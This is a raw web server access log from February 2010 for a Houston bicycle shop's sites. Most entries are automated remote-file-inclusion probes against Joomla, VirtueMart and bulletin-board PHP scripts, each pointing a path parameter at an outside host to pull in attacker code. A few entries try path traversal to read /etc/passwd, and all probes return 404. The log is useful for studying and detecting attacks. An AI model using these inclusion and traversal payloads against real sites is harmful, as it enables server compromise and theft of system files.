85.25.26.87 - - [10/Feb/2010:10:24:17 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:10:24:50 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:25:03 -0800] "GET /bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:25:03 -0800] "GET /logs//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.93.149.176 - - [10/Feb/2010:10:25:03 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board.skin.path=http://antigua.granada.notariado.org//appserv/x? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:10:28:49 -0800] "GET /logs/scripts.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
81.26.219.151 - - [10/Feb/2010:10:33:45 -0800] "GET /server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:33:45 -0800] "GET /logs/access.log/server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:33:45 -0800] "GET /logs/server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:37:23 -0800] "GET /logs/server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:37:23 -0800] "GET /server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:37:24 -0800] "GET /logs/access.log%20%20/server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:38:33 -0800] "GET /logs/server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:38:33 -0800] "GET /logs/access.log/server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
81.26.219.151 - - [10/Feb/2010:10:38:33 -0800] "GET /server.php?mosConfig_absolute_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:10:43:57 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:10:43:57 -0800] "GET /translations/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.23.18.60 - - [10/Feb/2010:10:43:57 -0800] "GET /translations/English-US.txt%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
67.195.115.111 - - [10/Feb/2010:10:48:44 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
67.195.115.111 - - [10/Feb/2010:10:48:46 -0800] "GET /bullitinboard/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 518 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "bicyclestoreshouston.com"
119.63.198.37 - - [10/Feb/2010:11:11:31 -0800] "GET /bullitinboard/viewtopic.php?p=15890 HTTP/1.1" 200 533 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "bicyclestoreshouston.com"
200.219.195.66 - - [10/Feb/2010:11:15:30 -0800] "GET //vwar/backup/errors.php?error=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "houstonbikeshop.com"
200.219.195.66 - - [10/Feb/2010:11:15:43 -0800] "GET //vwar/backup/errors.php?error=./../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:11:21:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:11:21:17 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:11:21:17 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:11:36:35 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:37:39 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:37:39 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:37:39 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:11:39:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:40:22 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:40:22 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:40:22 -0800] "GET /logs/access.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:43:54 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:43:54 -0800] "GET /logs/access.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
83.103.72.130 - - [10/Feb/2010:11:43:55 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.airbrush.cl/airbrush/m2/content/geshi/.../icon/fxd?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:11:48:00 -0800] "GET /logs/access.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:11:48:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
24.23.78.174 - - [10/Feb/2010:11:48:01 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 - "-" "libwww-perl/5.820" "houstonbikeshop.com"
67.195.115.119 - - [10/Feb/2010:11:49:10 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
67.195.115.119 - - [10/Feb/2010:11:49:10 -0800] "GET /translations/Danish.txt HTTP/1.0" 200 31970 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:01 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:01 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:01 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:46 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:46 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:56 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:56 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:06:56 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:21:05 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:21:05 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:21:34 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:21:34 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:21:34 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:22:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:23:00 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:23:00 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:23:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:23:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:23:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:24:13 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:13 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:13 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:22 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:22 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:22 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:33 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:33 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:24:33 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
209.59.163.57 - - [10/Feb/2010:12:25:19 -0800] "GET /logs/access.log//include/write.php?dir=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
209.59.163.57 - - [10/Feb/2010:12:25:19 -0800] "GET /logs//include/write.php?dir=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
209.59.163.57 - - [10/Feb/2010:12:25:19 -0800] "GET /include/write.php?dir=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:26:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:26:28 -0800] "GET /logs/scripts.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:26:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:26:45 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:26:45 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:26:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
193.47.80.45 - - [10/Feb/2010:12:27:31 -0800] "GET /Rides.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.svbikes.com"
74.208.14.52 - - [10/Feb/2010:12:27:57 -0800] "GET /logs/access.log%20%20/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:27:57 -0800] "GET /error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:27:57 -0800] "GET /logs/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:30:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:30:49 -0800] "GET /error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:30:49 -0800] "GET /logs/access.log%20%20/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:30:49 -0800] "GET /logs/error.php?dir=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:12:31:53 -0800] "GET /bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:12:31:53 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:12:31:53 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:33:23 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:33:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
220.73.144.196 - - [10/Feb/2010:12:34:17 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
124.115.6.17 - - [10/Feb/2010:12:37:51 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "Sosospider+(+http://help.soso.com/webspider.htm)" "www.houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:38:48 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:39:59 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:39:59 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:39:59 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:40:03 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:40:03 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.208.14.52 - - [10/Feb/2010:12:40:03 -0800] "GET /logs/access.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.bokji.or.kr/id/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:43:41 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:43:41 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:43:41 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
74.50.85.229 - - [10/Feb/2010:12:43:43 -0800] "GET /logs/access.log//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:44:28 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:44:28 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:44:28 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:44:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:44:49 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:44:49 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
220.73.144.196 - - [10/Feb/2010:12:46:03 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "bicyclestoreshouston.com"
87.106.134.174 - - [10/Feb/2010:12:55:58 -0800] "GET /bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:55:58 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:55:58 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:56:28 -0800] "GET /bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:56:28 -0800] "GET /logs//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
87.106.134.174 - - [10/Feb/2010:12:56:28 -0800] "GET /logs/access.log%20%20//bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
